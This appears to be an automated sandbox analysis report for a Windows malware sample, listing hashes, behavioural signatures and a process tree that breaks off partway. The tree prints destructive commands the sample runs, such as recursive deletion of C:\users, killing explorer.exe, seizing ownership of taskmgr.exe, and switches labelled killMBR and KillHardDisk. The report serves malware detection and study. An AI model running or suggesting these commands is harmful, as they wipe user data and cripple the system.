47a85b40116a374660e675def74714a4f392ecde2a9c466c57f2de0450176b69

Analysis

max time kernel
64s
max time network
139s
platform
windows10-2004_x64
resource
win10v2004-20231023-en
resource tags

arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system
submitted
28/10/2023, 19:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NEAS.9615548690563c4e2d46a44fb4970d70.exe
Size

3.0MB
MD5

9615548690563c4e2d46a44fb4970d70
SHA1

72b93c2bc1050b725fcb3975842f96ad0362609d
SHA256

47a85b40116a374660e675def74714a4f392ecde2a9c466c57f2de0450176b69
SHA512

b7905c5cab5bbc32df7c65c61e1643e7bf6686ba1f797b9d2022e93bedf68463ad6038ab077336bb0532fab9a405b200efd5016b4c9288db948acb76780e82c4
SSDEEP

49152:j495UciMmq/NhjX5p3JOCdLAweZnE5c965nqqIP2Itdf:jk5LhzACdLAlnE5co5nqqIP2Itdf

Score

7^/10

discovery

Malware Config

Signatures

Executes dropped EXE 59 IoCs

pid	Process
3456	NEAS.9615548690563c4e2d46a44fb4970d707.exe
2956	NEAS.9615548690563c4e2d46a44fb4970d707.exe
4448	NEAS.9615548690563c4e2d46a44fb4970d707.exe
4820	NEAS.9615548690563c4e2d46a44fb4970d705.exe
2500	NEAS.9615548690563c4e2d46a44fb4970d707.exe
3772	NEAS.9615548690563c4e2d46a44fb4970d707.exe
400	NEAS.9615548690563c4e2d46a44fb4970d707.exe
1996	NEAS.9615548690563c4e2d46a44fb4970d704.exe
5036	NEAS.9615548690563c4e2d46a44fb4970d705.exe
4040	NEAS.9615548690563c4e2d46a44fb4970d707.exe
2812	NEAS.9615548690563c4e2d46a44fb4970d7077.exe
3016	NEAS.9615548690563c4e2d46a44fb4970d705.exe
2176	NEAS.9615548690563c4e2d46a44fb4970d707.exe
1720	NEAS.9615548690563c4e2d46a44fb4970d700.exe
448	NEAS.9615548690563c4e2d46a44fb4970d7070.exe
568	NEAS.9615548690563c4e2d46a44fb4970d705.exe
5160	NEAS.9615548690563c4e2d46a44fb4970d707.exe
5168	NEAS.9615548690563c4e2d46a44fb4970d707.exe
5352	NEAS.9615548690563c4e2d46a44fb4970d7077.exe
5388	NEAS.9615548690563c4e2d46a44fb4970d7079.exe
5452	NEAS.9615548690563c4e2d46a44fb4970d705.exe
5460	NEAS.9615548690563c4e2d46a44fb4970d704.exe
5732	NEAS.9615548690563c4e2d46a44fb4970d700.exe
5760	NEAS.9615548690563c4e2d46a44fb4970d7070.exe
6016	NEAS.9615548690563c4e2d46a44fb4970d707.exe
6052	NEAS.9615548690563c4e2d46a44fb4970d707.exe
6072	NEAS.9615548690563c4e2d46a44fb4970d705.exe
2348	NEAS.9615548690563c4e2d46a44fb4970d707.exe
5768	NEAS.9615548690563c4e2d46a44fb4970d700.exe
2892	NEAS.9615548690563c4e2d46a44fb4970d7070.exe
4600	NEAS.9615548690563c4e2d46a44fb4970d705.exe
6036	NEAS.9615548690563c4e2d46a44fb4970d704.exe
5280	NEAS.9615548690563c4e2d46a44fb4970d7077.exe
1820	NEAS.9615548690563c4e2d46a44fb4970d7079.exe
6348	NEAS.9615548690563c4e2d46a44fb4970d7076.exe
6340	NEAS.9615548690563c4e2d46a44fb4970d7057.exe
6372	NEAS.9615548690563c4e2d46a44fb4970d707.exe
6440	NEAS.9615548690563c4e2d46a44fb4970d706.exe
6556	NEAS.9615548690563c4e2d46a44fb4970d707.exe
6564	NEAS.9615548690563c4e2d46a44fb4970d705.exe
6612	NEAS.9615548690563c4e2d46a44fb4970d707.exe
6716	NEAS.9615548690563c4e2d46a44fb4970d7079.exe
7044	NEAS.9615548690563c4e2d46a44fb4970d705.exe
7052	NEAS.9615548690563c4e2d46a44fb4970d707.exe
752	NEAS.9615548690563c4e2d46a44fb4970d7073.exe
5928	NEAS.9615548690563c4e2d46a44fb4970d7073.exe
4328	NEAS.9615548690563c4e2d46a44fb4970d7000.exe
5448	NEAS.9615548690563c4e2d46a44fb4970d7050.exe
7584	NEAS.9615548690563c4e2d46a44fb4970d70700.exe
7592	NEAS.9615548690563c4e2d46a44fb4970d703.exe
7804	NEAS.9615548690563c4e2d46a44fb4970d7057.exe
8144	NEAS.9615548690563c4e2d46a44fb4970d70770.exe
7256	NEAS.9615548690563c4e2d46a44fb4970d70796.exe
7516	NEAS.9615548690563c4e2d46a44fb4970d7053.exe
1568	NEAS.9615548690563c4e2d46a44fb4970d7040.exe
7252	NEAS.9615548690563c4e2d46a44fb4970d7072.exe
7796	NEAS.9615548690563c4e2d46a44fb4970d7007.exe
5456	NEAS.9615548690563c4e2d46a44fb4970d7055.exe
9088	NEAS.9615548690563c4e2d46a44fb4970d7070.exe

Modifies file permissions 1 TTPs 18 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
10272	takeown.exe
9116	takeown.exe
4424	takeown.exe
10264	takeown.exe
10256	takeown.exe
10248	takeown.exe
3180	takeown.exe
3732	takeown.exe
9364	takeown.exe
9380	takeown.exe
10280	takeown.exe
12064	takeown.exe
6264	takeown.exe
9288	takeown.exe
2900	takeown.exe
10180	takeown.exe
9428	takeown.exe
8356	takeown.exe

Kills process with taskkill 36 IoCs

evasion

pid	Process
1876	taskkill.exe
7012	taskkill.exe
7992	taskkill.exe
7440	taskkill.exe
6624	taskkill.exe
8640	taskkill.exe
5904	taskkill.exe
8624	taskkill.exe
1340	taskkill.exe
8000	taskkill.exe
7984	taskkill.exe
8616	taskkill.exe
2500	taskkill.exe
224	taskkill.exe
8608	taskkill.exe
5852	taskkill.exe
2752	taskkill.exe
500	taskkill.exe
8576	taskkill.exe
8656	taskkill.exe
208	taskkill.exe
4532	taskkill.exe
1588	taskkill.exe
6672	taskkill.exe
5656	taskkill.exe
7192	taskkill.exe
6472	taskkill.exe
6928	taskkill.exe
8680	taskkill.exe
8672	taskkill.exe
5116	taskkill.exe
8932	taskkill.exe
7200	taskkill.exe
8648	taskkill.exe
4100	taskkill.exe
8664	taskkill.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeAssignPrimaryTokenPrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeLockMemoryPrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeIncreaseQuotaPrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeMachineAccountPrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeTcbPrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeSecurityPrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeTakeOwnershipPrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeLoadDriverPrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeSystemProfilePrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeSystemtimePrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeProfSingleProcessPrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeIncBasePriorityPrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeCreatePagefilePrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeCreatePermanentPrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeBackupPrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeRestorePrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeShutdownPrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeDebugPrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeAuditPrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeSystemEnvironmentPrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeChangeNotifyPrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeRemoteShutdownPrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeUndockPrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeSyncAgentPrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeEnableDelegationPrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeManageVolumePrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeImpersonatePrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeCreateGlobalPrivilege	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: 31	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: 32	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: 33	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: 34	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: 35	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeCreateTokenPrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeAssignPrimaryTokenPrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeLockMemoryPrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeIncreaseQuotaPrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeMachineAccountPrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeTcbPrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeSecurityPrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeTakeOwnershipPrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeLoadDriverPrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeSystemProfilePrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeSystemtimePrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeProfSingleProcessPrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeIncBasePriorityPrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeCreatePagefilePrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeCreatePermanentPrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeBackupPrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeRestorePrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeShutdownPrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeDebugPrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeAuditPrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeSystemEnvironmentPrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeChangeNotifyPrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeRemoteShutdownPrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeUndockPrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeSyncAgentPrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeEnableDelegationPrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeManageVolumePrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeImpersonatePrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: SeCreateGlobalPrivilege	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe
Token: 31	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1072 wrote to memory of 1420	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe	89
PID 1072 wrote to memory of 1420	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe	89
PID 1420 wrote to memory of 1428	1420	cmd.exe	90
PID 1420 wrote to memory of 1428	1420	cmd.exe	90
PID 1072 wrote to memory of 4028	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe	92
PID 1072 wrote to memory of 4028	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe	92
PID 4028 wrote to memory of 4836	4028	cmd.exe	93
PID 4028 wrote to memory of 4836	4028	cmd.exe	93
PID 1428 wrote to memory of 4872	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe	94
PID 1428 wrote to memory of 4872	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe	94
PID 1072 wrote to memory of 396	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe	96
PID 1072 wrote to memory of 396	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe	96
PID 396 wrote to memory of 2444	396	cmd.exe	106
PID 396 wrote to memory of 2444	396	cmd.exe	106
PID 1072 wrote to memory of 4804	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe	100
PID 1072 wrote to memory of 4804	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe	100
PID 4804 wrote to memory of 4020	4804	cmd.exe	98
PID 4804 wrote to memory of 4020	4804	cmd.exe	98
PID 1072 wrote to memory of 1544	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe	101
PID 1072 wrote to memory of 1544	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe	101
PID 1544 wrote to memory of 1304	1544	cmd.exe	103
PID 1544 wrote to memory of 1304	1544	cmd.exe	103
PID 1428 wrote to memory of 3604	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe	102
PID 1428 wrote to memory of 3604	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe	102
PID 2444 wrote to memory of 4056	2444	NEAS.9615548690563c4e2d46a44fb4970d70.exe	104
PID 2444 wrote to memory of 4056	2444	NEAS.9615548690563c4e2d46a44fb4970d70.exe	104
PID 1072 wrote to memory of 4472	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe	107
PID 1072 wrote to memory of 4472	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe	107
PID 4472 wrote to memory of 212	4472	cmd.exe	108
PID 4472 wrote to memory of 212	4472	cmd.exe	108
PID 3604 wrote to memory of 3456	3604	cmd.exe	113
PID 3604 wrote to memory of 3456	3604	cmd.exe	113
PID 1304 wrote to memory of 1148	1304	NEAS.9615548690563c4e2d46a44fb4970d70.exe	110
PID 1304 wrote to memory of 1148	1304	NEAS.9615548690563c4e2d46a44fb4970d70.exe	110
PID 1072 wrote to memory of 1560	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe	114
PID 1072 wrote to memory of 1560	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe	114
PID 1428 wrote to memory of 3324	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe	115
PID 1428 wrote to memory of 3324	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe	115
PID 1560 wrote to memory of 3504	1560	cmd.exe	116
PID 1560 wrote to memory of 3504	1560	cmd.exe	116
PID 2444 wrote to memory of 964	2444	NEAS.9615548690563c4e2d46a44fb4970d70.exe	118
PID 2444 wrote to memory of 964	2444	NEAS.9615548690563c4e2d46a44fb4970d70.exe	118
PID 1072 wrote to memory of 3016	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe	165
PID 1072 wrote to memory of 3016	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe	165
PID 3016 wrote to memory of 2792	3016	NEAS.9615548690563c4e2d46a44fb4970d705.exe	120
PID 3016 wrote to memory of 2792	3016	NEAS.9615548690563c4e2d46a44fb4970d705.exe	120
PID 1428 wrote to memory of 3848	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe	231
PID 1428 wrote to memory of 3848	1428	NEAS.9615548690563c4e2d46a44fb4970d70.exe	231
PID 964 wrote to memory of 2956	964	cmd.exe	122
PID 964 wrote to memory of 2956	964	cmd.exe	122
PID 3456 wrote to memory of 4396	3456	NEAS.9615548690563c4e2d46a44fb4970d707.exe	124
PID 3456 wrote to memory of 4396	3456	NEAS.9615548690563c4e2d46a44fb4970d707.exe	124
PID 1072 wrote to memory of 488	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe	126
PID 1072 wrote to memory of 488	1072	NEAS.9615548690563c4e2d46a44fb4970d70.exe	126
PID 2444 wrote to memory of 436	2444	NEAS.9615548690563c4e2d46a44fb4970d70.exe	179
PID 2444 wrote to memory of 436	2444	NEAS.9615548690563c4e2d46a44fb4970d70.exe	179
PID 3504 wrote to memory of 3508	3504	NEAS.9615548690563c4e2d46a44fb4970d70.exe	169
PID 3504 wrote to memory of 3508	3504	NEAS.9615548690563c4e2d46a44fb4970d70.exe	169
PID 2956 wrote to memory of 3384	2956	NEAS.9615548690563c4e2d46a44fb4970d707.exe	129
PID 2956 wrote to memory of 3384	2956	NEAS.9615548690563c4e2d46a44fb4970d707.exe	129
PID 3384 wrote to memory of 4448	3384	cmd.exe	130
PID 3384 wrote to memory of 4448	3384	cmd.exe	130
PID 2956 wrote to memory of 3372	2956	NEAS.9615548690563c4e2d46a44fb4970d707.exe	132
PID 2956 wrote to memory of 3372	2956	NEAS.9615548690563c4e2d46a44fb4970d707.exe	132

C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe
"C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /protect 1698530834
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1420
- - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /protect 1698530834
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1428
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe+716328.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
      4⤵
      PID:4872
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe 1698530834
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3604
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe 1698530834
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3456
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /protect 1698530834
        6⤵
        
        PID:4396
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /protect 1698530834
        7⤵
        Executes dropped EXE
        
        PID:2500
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe+026554.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7070.exe
        8⤵
        
        PID:2752
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7070.exe 1698530834
        8⤵
        
        PID:5012
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7070.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7070.exe 1698530834
        9⤵
        Executes dropped EXE
        
        PID:448
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7070.exe /protect 1698530834
        10⤵
        
        PID:5580
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7070.exe /save 1698530834
        10⤵
        
        PID:5840
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7070.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7070.exe /save 1698530834
        11⤵
        Executes dropped EXE
        
        PID:2892
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:4500
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:224
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe+621829.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7076.exe
        8⤵
        
        PID:492
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7076.exe 1698530834
        8⤵
        
        PID:5668
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7076.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7076.exe 1698530834
        9⤵
        Executes dropped EXE
        
        PID:6348
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:5060
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:1588
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7076.exe /autoup 1698530834
        10⤵
        
        PID:1472
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7076.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7076.exe /autoup 1698530834
        11⤵
        
        PID:5680
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7076.exe /killwindows 1698530834
        10⤵
        
        PID:4616
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7076.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7076.exe /killwindows 1698530834
        11⤵
        
        PID:5548
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:4840
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        13⤵
        Modifies file permissions
        
        PID:3180
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Cacls C:\windows\system32\taskmgr.exe /t /e /c /gAdmin:F
        12⤵
        
        PID:11548
        
        C:\Windows\system32\cacls.exe
        
        Cacls C:\windows\system32\taskmgr.exe /t /e /c /gAdmin:F
        13⤵
        
        PID:11756
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7076.exe /KillHardDisk 1698530834
        10⤵
        
        PID:5512
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7076.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7076.exe /KillHardDisk 1698530834
        11⤵
        
        PID:5288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:5344
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7076.exe /killMBR 1698530834
        10⤵
        
        PID:9548
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7076.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7076.exe /killMBR 1698530834
        11⤵
        
        PID:11056
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7076.exe /protect 1698530834
        10⤵
        
        PID:11796
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7076.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7076.exe /protect 1698530834
        11⤵
        
        PID:1600
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7076.exe+929230.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70769.exe
        12⤵
        
        PID:7644
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7076.exe /autoup 1698530834
        10⤵
        
        PID:12516
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7076.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7076.exe /autoup 1698530834
        11⤵
        
        PID:13116
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7076.exe C:\windows\system32\taskmgr.exe
        10⤵
        
        PID:5572
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /save 1698530834
        6⤵
        
        PID:4064
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /save 1698530834
        7⤵
        Executes dropped EXE
        
        PID:400
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /protect 1698530834
        6⤵
        
        PID:4408
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /protect 1698530834
        7⤵
        Executes dropped EXE
        
        PID:2176
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe+715282.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe
        8⤵
        
        PID:2876
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /save 1698530834
        6⤵
        
        PID:2416
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /save 1698530834
        7⤵
        Executes dropped EXE
        
        PID:5168
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /protect 1698530834
        6⤵
        
        PID:5276
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /protect 1698530834
        7⤵
        Executes dropped EXE
        
        PID:6016
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7073.exe 1698530834
        8⤵
        
        PID:6668
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7073.exe
        
